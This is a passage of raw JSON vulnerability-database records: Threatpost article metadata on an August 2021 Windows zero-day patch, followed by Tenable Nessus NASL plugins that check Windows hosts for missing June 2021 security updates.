Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T21:17:58", "type": "threatpost", "title": "Actively Exploited Windows Zero-Day Gets a Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26424", "CVE-2021-26432", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-34530", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-10T21:17:58", "id": "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "href": "https://threatpost.com/exploited-windows-zero-day-patch/168539/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:30:04", "description": "The remote Windows host is missing security update 5003695. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003695: Windows Server 2008 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31962", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003695.NASL", "href": "https://www.tenable.com/plugins/nessus/150357", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150357);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31962\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003661\");\n script_xref(name:\"MSKB\", value:\"5003695\");\n script_xref(name:\"MSFT\", value:\"MS21-5003661\");\n script_xref(name:\"MSFT\", value:\"MS21-5003695\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003695: Windows Server 2008 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003695. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003695\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003661\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003695\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003695',\n '5003661'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003695, 5003661])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:30:16", "description": "The remote Windows host is missing security update 5003694. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003694: Windows 7 and Windows Server 2008 R2 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003694.NASL", "href": "https://www.tenable.com/plugins/nessus/150368", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150368);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003667\");\n script_xref(name:\"MSKB\", value:\"5003694\");\n script_xref(name:\"MSFT\", value:\"MS21-5003667\");\n script_xref(name:\"MSFT\", value:\"MS21-5003694\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003694: Windows 7 and Windows Server 2008 R2 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003694. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003694\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003667\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003694\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003694',\n '5003667'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003694, 5003667])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:30:04", "description": "The remote Windows host is missing security update 5003697. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003697: Windows Server 2012 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003697.NASL", "href": "https://www.tenable.com/plugins/nessus/150363", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150363);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003697\");\n script_xref(name:\"MSFT\", value:\"MS21-5003697\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003697: Windows Server 2012 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003697. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003697\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003697\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003697'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003697])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:29:42", "description": "The remote Windows host is missing security update 5003681. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003681: Windows Server 2012 R2 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003681.NASL", "href": "https://www.tenable.com/plugins/nessus/150354", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150354);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003671\");\n script_xref(name:\"MSKB\", value:\"5003681\");\n script_xref(name:\"MSFT\", value:\"MS21-5003671\");\n script_xref(name:\"MSFT\", value:\"MS21-5003681\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003681: Windows Server 2012 R2 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003681. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003671\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003681\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-06';\nkbs = make_list(\n '5003681',\n '5003671'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2021',\n bulletin:bulletin,\n rollup_kb_list:[5003681, 5003671])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:30:16", "description": "The remote Windows host is missing security update 5003638. It is, therefore, affected by multiple vulnerabilities", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": "KB5003638: Windows 10 version 1607 / Windows Server 2016 Security Update (June 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33742"], "modified": "2023-02-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUN_5003638.NASL", "href": "https://www.tenable.com/plugins/nessus/150367", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150367);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/15\");\n\n script_cve_id(\n \"CVE-2021-1675\",\n \"CVE-2021-26414\",\n \"CVE-2021-31199\",\n \"CVE-2021-31201\",\n \"CVE-2021-31953\",\n \"CVE-2021-31954\",\n \"CVE-2021-31956\",\n \"CVE-2021-31958\",\n \"CVE-2021-31959\",\n \"CVE-2021-31962\",\n \"CVE-2021-31968\",\n \"CVE-2021-31970\",\n \"CVE-2021-31971\",\n \"CVE-2021-31972\",\n \"CVE-2021-31973\",\n \"CVE-2021-31974\",\n \"CVE-2021-31975\",\n \"CVE-2021-31976\",\n \"CVE-2021-31977\",\n \"CVE-2021-33742\"\n );\n script_xref(name:\"MSKB\", value:\"5003638\");\n script_xref(name:\"MSFT\", value:\"MS21-5003638\");\n script_xref(name:\"IAVA\", value:\"2021-A-0280-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0279-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0032\");\n\n script_name(english:\"KB5003638: Windows 10 version 1607 / Windows Server 2016 Security Update (June 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5003638. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5003638\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5003638\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-31956\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-31962\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 